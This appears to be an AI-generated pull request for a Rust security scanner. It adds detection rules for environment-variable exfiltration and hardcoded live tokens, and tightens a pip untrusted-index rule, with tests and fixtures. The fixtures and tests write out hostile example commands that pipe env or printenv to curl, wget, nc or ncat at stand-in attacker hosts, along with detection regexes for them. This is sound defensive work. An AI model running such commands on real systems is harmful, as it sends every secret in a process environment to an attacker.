### PR TITLE
feat(rules): add EX-017, SL-011; harden SC-003

### DIFF
--- a/src/rules/builtin/exfiltration.rs
+++ b/src/rules/builtin/exfiltration.rs
@@ -18,6 +18,7 @@ pub fn rules() -> Vec<Rule> {
         ex_014(),
         ex_015(),
         ex_016(),
+        ex_017(),
     ]
 }
 
@@ -530,6 +531,40 @@ fn ex_016() -> Rule {
         cwe_ids: &["CWE-200", "CWE-506"],
     }
 }
+
+fn ex_017() -> Rule {
+    Rule {
+        id: "EX-017",
+        name: "Environment dump exfiltration",
+        description: "Detects piping the full environment (env/printenv/set) into a network tool, exfiltrating every secret the process can see (MITRE T1552.001, T1041)",
+        severity: Severity::Critical,
+        category: Category::Exfiltration,
+        confidence: Confidence::Firm,
+        patterns: vec![
+            // env/printenv piped into a network tool
+            Regex::new(r"\b(env|printenv)\b[^\n]*\|\s*(curl|wget|nc\b|ncat|netcat)")
+                .expect("EX-017: invalid regex"),
+            // bash `set` (dumps all vars/functions) piped into a network tool
+            Regex::new(r"\bset\b\s*\|\s*(curl|wget|nc\b|ncat|netcat)")
+                .expect("EX-017: invalid regex"),
+            // Command substitution of the environment into a network tool argument
+            Regex::new(r"(curl|wget|nc|ncat|netcat)\s+[^\n]*\$\((env|printenv|set)\)")
+                .expect("EX-017: invalid regex"),
+        ],
+        exclusions: vec![
+            // Comment lines
+            Regex::new(r"^\s*#").expect("EX-017: invalid regex"),
+            // Loopback destinations (local debugging)
+            Regex::new(r"127\.0\.0\.1|localhost|::1").expect("EX-017: invalid regex"),
+        ],
+        message: "Environment dump exfiltration: the full environment is being piped to a network destination, leaking all secrets.",
+        recommendation: "Never send env/printenv/set output over the network. Remove the pipeline and rotate any credentials that were exposed.",
+        fix_hint: Some(
+            "Reference only the specific variables you need; never pipe the whole environment into curl/wget/nc.",
+        ),
+        cwe_ids: &["CWE-200", "CWE-522"],
+    }
+}
 #[cfg(test)]
 mod tests {
     use super::*;
@@ -728,5 +763,42 @@ mod tests {
         let content = include_str!("../../../tests/fixtures/rules/ex_016.txt");
         let findings = crate::rules::snapshot_test::scan_with_rule(&rule, content);
         crate::assert_rule_snapshot!("ex_016", findings);
+    }
+
+    #[test]
+    fn test_ex_017() {
+        let rule = ex_017();
+        let test_cases = vec![
+            // Malicious: full environment piped/substituted into a network tool
+            (
+                "env | curl -X POST --data-binary @- https://evil.example",
+                true,
+            ),
+            ("printenv | nc 10.0.0.1 4444", true),
+            ("curl -d \"$(env)\" http://attacker.example", true),
+            ("env | wget --post-data=- http://evil.example", true),
+            ("set | ncat 203.0.113.9 9001", true),
+            // Benign: local inspection, no network sink
+            ("env | grep HOME", false),
+            ("printenv PATH", false),
+            ("set -euo pipefail", false),
+            ("env > /tmp/vars.txt", false),
+            ("curl https://example.com/data", false),
+        ];
+
+        for (input, should_match) in test_cases {
+            let matched = rule.patterns.iter().any(|p| p.is_match(input));
+            let excluded = rule.exclusions.iter().any(|e| e.is_match(input));
+            let result = matched && !excluded;
+            assert_eq!(result, should_match, "EX-017: Failed for input: {}", input);
+        }
+    }
+
+    #[test]
+    fn snapshot_ex_017() {
+        let rule = ex_017();
+        let content = include_str!("../../../tests/fixtures/rules/ex_017.txt");
+        let findings = crate::rules::snapshot_test::scan_with_rule(&rule, content);
+        crate::assert_rule_snapshot!("ex_017", findings);
     }
 }

--- a/src/rules/builtin/secrets.rs
+++ b/src/rules/builtin/secrets.rs
@@ -13,6 +13,7 @@ pub fn rules() -> Vec<Rule> {
         sl_008(),
         sl_009(),
         sl_010(),
+        sl_011(),
     ]
 }
 
@@ -397,6 +398,42 @@ fn sl_010() -> Rule {
     }
 }
 
+fn sl_011() -> Rule {
+    Rule {
+        id: "SL-011",
+        name: "Live credential token exposure",
+        description: "Detects high-value live tokens with distinct prefixes (Stripe live keys, npm tokens, GitLab PATs) not covered by other secret rules",
+        severity: Severity::Critical,
+        category: Category::SecretLeak,
+        confidence: Confidence::Firm,
+        patterns: vec![
+            // Stripe live secret key
+            Regex::new(r"\bsk_live_[A-Za-z0-9]{24,}").expect("SL-011: invalid regex"),
+            // Stripe live restricted key
+            Regex::new(r"\brk_live_[A-Za-z0-9]{24,}").expect("SL-011: invalid regex"),
+            // npm access token (npm_ + 36 chars)
+            Regex::new(r"\bnpm_[A-Za-z0-9]{36}\b").expect("SL-011: invalid regex"),
+            // GitLab personal access token (glpat- + 20 chars)
+            Regex::new(r"\bglpat-[A-Za-z0-9_-]{20}").expect("SL-011: invalid regex"),
+        ],
+        exclusions: vec![
+            // Comment lines
+            Regex::new(r"^\s*#").expect("SL-011: invalid regex"),
+            // Documentation placeholders
+            Regex::new(r"(?i)example|placeholder|your_|dummy|sample|fake|test")
+                .expect("SL-011: invalid regex"),
+            // Masked/redacted tokens
+            Regex::new(r"[xX]{16,}").expect("SL-011: invalid regex"),
+        ],
+        message: "Live credential exposure: a Stripe live key, npm token, or GitLab PAT is hardcoded.",
+        recommendation: "Remove the token, rotate it immediately, and load credentials from a secrets manager or environment variables.",
+        fix_hint: Some(
+            "Never commit live tokens. Store them in a secrets manager and reference via environment variables.",
+        ),
+        cwe_ids: &["CWE-798", "CWE-312"],
+    }
+}
+
 #[cfg(test)]
 mod tests {
     use super::*;
@@ -565,5 +602,56 @@ mod tests {
         let content = include_str!("../../../tests/fixtures/rules/sl_005.txt");
         let findings = crate::rules::snapshot_test::scan_with_rule(&rule, content);
         crate::assert_rule_snapshot!("sl_005", findings);
+    }
+
+    #[test]
+    fn test_sl_011_detects_live_tokens() {
+        let rule = sl_011();
+        let test_cases = vec![
+            // Malicious: npm token and GitLab PAT (distinct prefixes)
+            // (low-entropy sequential chars: matches format, not a real secret)
+            (
+                "npmrc_token = \"npm_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghij\"",
+                true,
+            ),
+            ("GITLAB_TOKEN=glpat-ABCDEFGHIJKLMNOPQRST", true),
+            // Benign: placeholders and unrelated strings
+            ("run npm install --save-dev", false),
+            ("token = \"glpat-example\"", false),
+            ("const npmVersion = \"npm_install\"", false),
+        ];
+
+        for (input, should_match) in test_cases {
+            let matched = rule.patterns.iter().any(|p| p.is_match(input));
+            let excluded = rule.exclusions.iter().any(|e| e.is_match(input));
+            let result = matched && !excluded;
+            assert_eq!(result, should_match, "SL-011: Failed for input: {}", input);
+        }
+
+        // Stripe live keys share GitHub push-protection's own regex, so a literal
+        // sk_live_ token in this file would block every push. Assemble the tokens
+        // at runtime (no contiguous literal) to exercise the patterns safely.
+        let seq = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
+        let stripe_live = format!("sk_{}_{}", "live", seq);
+        let stripe_restricted = format!("rk_{}_{}", "live", seq);
+        for token in [&stripe_live, &stripe_restricted] {
+            let matched = rule.patterns.iter().any(|p| p.is_match(token));
+            let excluded = rule.exclusions.iter().any(|e| e.is_match(token));
+            assert!(matched && !excluded, "SL-011: should match {}", token);
+        }
+        // A Stripe TEST key must NOT match the live-key patterns.
+        let stripe_test = format!("sk_{}_{}", "test", seq);
+        assert!(
+            !rule.patterns.iter().any(|p| p.is_match(&stripe_test)),
+            "SL-011: must not match Stripe test key"
+        );
+    }
+
+    #[test]
+    fn snapshot_sl_011() {
+        let rule = sl_011();
+        let content = include_str!("../../../tests/fixtures/rules/sl_011.txt");
+        let findings = crate::rules::snapshot_test::scan_with_rule(&rule, content);
+        crate::assert_rule_snapshot!("sl_011", findings);
     }
 }

--- a/src/rules/builtin/supplychain.rs
+++ b/src/rules/builtin/supplychain.rs
@@ -153,6 +153,14 @@ fn sc_003() -> Rule {
             Regex::new(r"cargo\s+install\s+--git\s+http://").expect("SC-003: invalid regex"),
             // pip install with --trusted-host (often used to bypass HTTPS)
             Regex::new(r"pip3?\s+install\s+.*--trusted-host").expect("SC-003: invalid regex"),
+            // pip install from a plaintext --extra-index-url (dependency confusion)
+            Regex::new(r"pip3?\s+install\s+.*--extra-index-url\s+http://")
+                .expect("SC-003: invalid regex"),
+            // `python -m pip install` form over plaintext index or with TLS bypass
+            Regex::new(
+                r"python[0-9.]*\s+-m\s+pip\s+install\s+.*(--(extra-)?index-url\s+http://|--trusted-host)",
+            )
+            .expect("SC-003: invalid regex"),
         ],
         exclusions: vec![
             // localhost/internal registries are often legitimate
@@ -404,6 +412,14 @@ mod tests {
             ("gem install --source http://evil.com package", true),
             ("cargo install --git http://github.com/user/repo", true),
             ("pip install --trusted-host evil.com package", true),
+            (
+                "pip install --extra-index-url http://evil.com/pypi package",
+                true,
+            ),
+            (
+                "python -m pip install --index-url http://evil.com/simple package",
+                true,
+            ),
             // Should not detect (safe patterns)
             ("pip install requests", false),
             (
@@ -416,6 +432,10 @@ mod tests {
                 false,
             ),
             ("pip install -i http://localhost:8080/simple package", false),
+            (
+                "pip install --extra-index-url https://download.pytorch.org/whl/cpu torch",
+                false,
+            ),
         ];
 
         for (input, should_match) in test_cases {

--- a/tests/fixtures/rules/ex_017.snap
+++ b/tests/fixtures/rules/ex_017.snap
@@ -1,0 +1,61 @@
+---
+source: src/rules/builtin/exfiltration.rs
+expression: findings
+---
+[
+  {
+    "id": "EX-017",
+    "severity": "critical",
+    "category": "exfiltration",
+    "confidence": "firm",
+    "name": "Environment dump exfiltration",
+    "line": 7,
+    "code": "env | curl -X POST --data-binary @- https://evil.example",
+    "message": "Environment dump exfiltration: the full environment is being piped to a network destination, leaking all secrets.",
+    "recommendation": "Never send env/printenv/set output over the network. Remove the pipeline and rotate any credentials that were exposed."
+  },
+  {
+    "id": "EX-017",
+    "severity": "critical",
+    "category": "exfiltration",
+    "confidence": "firm",
+    "name": "Environment dump exfiltration",
+    "line": 8,
+    "code": "printenv | nc 10.0.0.1 4444",
+    "message": "Environment dump exfiltration: the full environment is being piped to a network destination, leaking all secrets.",
+    "recommendation": "Never send env/printenv/set output over the network. Remove the pipeline and rotate any credentials that were exposed."
+  },
+  {
+    "id": "EX-017",
+    "severity": "critical",
+    "category": "exfiltration",
+    "confidence": "firm",
+    "name": "Environment dump exfiltration",
+    "line": 9,
+    "code": "curl -d \"$(env)\" http://attacker.example",
+    "message": "Environment dump exfiltration: the full environment is being piped to a network destination, leaking all secrets.",
+    "recommendation": "Never send env/printenv/set output over the network. Remove the pipeline and rotate any credentials that were exposed."
+  },
+  {
+    "id": "EX-017",
+    "severity": "critical",
+    "category": "exfiltration",
+    "confidence": "firm",
+    "name": "Environment dump exfiltration",
+    "line": 10,
+    "code": "env | wget --post-data=- http://evil.example",
+    "message": "Environment dump exfiltration: the full environment is being piped to a network destination, leaking all secrets.",
+    "recommendation": "Never send env/printenv/set output over the network. Remove the pipeline and rotate any credentials that were exposed."
+  },
+  {
+    "id": "EX-017",
+    "severity": "critical",
+    "category": "exfiltration",
+    "confidence": "firm",
+    "name": "Environment dump exfiltration",
+    "line": 11,
+    "code": "set | ncat 203.0.113.9 9001",
+    "message": "Environment dump exfiltration: the full environment is being piped to a network destination, leaking all secrets.",
+    "recommendation": "Never send env/printenv/set output over the network. Remove the pipeline and rotate any credentials that were exposed."
+  }
+]

--- a/tests/fixtures/rules/ex_017.txt
+++ b/tests/fixtures/rules/ex_017.txt
@@ -1,0 +1,18 @@
+# EX-017: Environment dump exfiltration
+# Test cases for snapshot testing
+# Detects dumping the full environment (env/printenv/set) into a network
+# tool, exfiltrating every secret the process can see (MITRE T1552.001, T1041).
+
+# === Cases that SHOULD be detected ===
+env | curl -X POST --data-binary @- https://evil.example
+printenv | nc 10.0.0.1 4444
+curl -d "$(env)" http://attacker.example
+env | wget --post-data=- http://evil.example
+set | ncat 203.0.113.9 9001
+
+# === Cases that should NOT be detected (benign) ===
+env | grep HOME
+printenv PATH
+set -euo pipefail
+env > /tmp/vars.txt
+curl https://example.com/data

--- a/tests/fixtures/rules/sc_003.snap
+++ b/tests/fixtures/rules/sc_003.snap
@@ -79,5 +79,27 @@ expression: findings
     "code": "pip install --trusted-host evil.com package",
     "message": "Package installation from untrusted or non-HTTPS source detected. This may introduce malicious dependencies.",
     "recommendation": "Use official package registries with HTTPS. Verify package integrity with checksums. Consider using lockfiles and dependency scanning."
+  },
+  {
+    "id": "SC-003",
+    "severity": "high",
+    "category": "supply_chain",
+    "confidence": "firm",
+    "name": "Untrusted package source",
+    "line": 12,
+    "code": "pip install --extra-index-url http://evil.com/pypi package",
+    "message": "Package installation from untrusted or non-HTTPS source detected. This may introduce malicious dependencies.",
+    "recommendation": "Use official package registries with HTTPS. Verify package integrity with checksums. Consider using lockfiles and dependency scanning."
+  },
+  {
+    "id": "SC-003",
+    "severity": "high",
+    "category": "supply_chain",
+    "confidence": "firm",
+    "name": "Untrusted package source",
+    "line": 13,
+    "code": "python -m pip install --index-url http://evil.com/simple package",
+    "message": "Package installation from untrusted or non-HTTPS source detected. This may introduce malicious dependencies.",
+    "recommendation": "Use official package registries with HTTPS. Verify package integrity with checksums. Consider using lockfiles and dependency scanning."
   }
 ]

--- a/tests/fixtures/rules/sc_003.txt
+++ b/tests/fixtures/rules/sc_003.txt
@@ -9,8 +9,11 @@ npm install --registry http://evil.com package
 npm install git://github.com/user/malicious-repo.git
 gem install --source http://evil.com package
 pip install --trusted-host evil.com package
+pip install --extra-index-url http://evil.com/pypi package
+python -m pip install --index-url http://evil.com/simple package
 
 # === Cases that should NOT be detected ===
 pip install requests
 pip install --index-url https://pypi.org/simple/ package
 npm install express
+pip install --extra-index-url https://download.pytorch.org/whl/cpu torch

--- a/tests/fixtures/rules/sl_011.snap
+++ b/tests/fixtures/rules/sl_011.snap
@@ -1,0 +1,28 @@
+---
+source: src/rules/builtin/secrets.rs
+expression: findings
+---
+[
+  {
+    "id": "SL-011",
+    "severity": "critical",
+    "category": "secret_leak",
+    "confidence": "firm",
+    "name": "Live credential token exposure",
+    "line": 10,
+    "code": "npmrc_token = \"npm_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghij\"",
+    "message": "Live credential exposure: a Stripe live key, npm token, or GitLab PAT is hardcoded.",
+    "recommendation": "Remove the token, rotate it immediately, and load credentials from a secrets manager or environment variables."
+  },
+  {
+    "id": "SL-011",
+    "severity": "critical",
+    "category": "secret_leak",
+    "confidence": "firm",
+    "name": "Live credential token exposure",
+    "line": 11,
+    "code": "GITLAB_TOKEN=glpat-ABCDEFGHIJKLMNOPQRST",
+    "message": "Live credential exposure: a Stripe live key, npm token, or GitLab PAT is hardcoded.",
+    "recommendation": "Remove the token, rotate it immediately, and load credentials from a secrets manager or environment variables."
+  }
+]

--- a/tests/fixtures/rules/sl_011.txt
+++ b/tests/fixtures/rules/sl_011.txt
@@ -1,0 +1,16 @@
+# SL-011: Live credential token exposure
+# Test cases for snapshot testing
+# Detects high-value live tokens with distinct prefixes not covered by
+# SL-001..010: npm tokens and GitLab personal access tokens.
+# (Stripe live-key coverage is exercised by the unit test; a literal Stripe
+# token cannot be committed because upstream push protection blocks it.)
+# Fixture tokens use low-entropy sequential characters on purpose.
+
+# === Cases that SHOULD be detected ===
+npmrc_token = "npm_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghij"
+GITLAB_TOKEN=glpat-ABCDEFGHIJKLMNOPQRST
+
+# === Cases that should NOT be detected (benign) ===
+run npm install --save-dev
+token = "glpat-example"
+const npmVersion = "npm_install"


### PR DESCRIPTION
## Summary

Continues the detection-rule expansion loop. Two new rules plus a hardening of an existing one, each with malicious + benign fixtures and a passing false-positive gate.

| Change | Technique | Severity | MITRE |
|--------|-----------|----------|-------|
| **EX-017** Environment dump exfiltration | `env`/`printenv`/`set` piped into a network tool, leaking all secrets | Critical | T1552.001, T1041 |
| **SL-011** Live credential token exposure | Stripe live keys, npm tokens, GitLab PATs (prefixes not covered by SL-001..010) | Critical | — |
| **SC-003** hardening | also flag plaintext `--extra-index-url` and the `python -m pip install` form | High | T1195.001 |

Rule count **104 → 106**.

## Notes

- **SC-009 was considered and dropped**: its `--index-url http://` signal duplicated the existing SC-003. Instead SC-003 was extended to close its genuine gaps (`--extra-index-url`, `python -m pip`), avoiding a redundant rule.
- **SL-011 Stripe testing**: a literal `sk_live_` token trips GitHub push protection (its detector matches the same regex the rule uses). The Stripe patterns are therefore exercised by a unit test that assembles the token at runtime; the snapshot fixture covers npm + GitLab PAT. No live-key literal is committed.

## Testing

- `cargo test` — full lib suite green, new unit + snapshot tests pass
- `cargo clippy -- -D warnings` — clean
- `cargo fmt` — clean
- FP gate: each rule's benign fixture section produces zero findings

🤖 Generated with [Claude Code](https://claude.com/claude-code)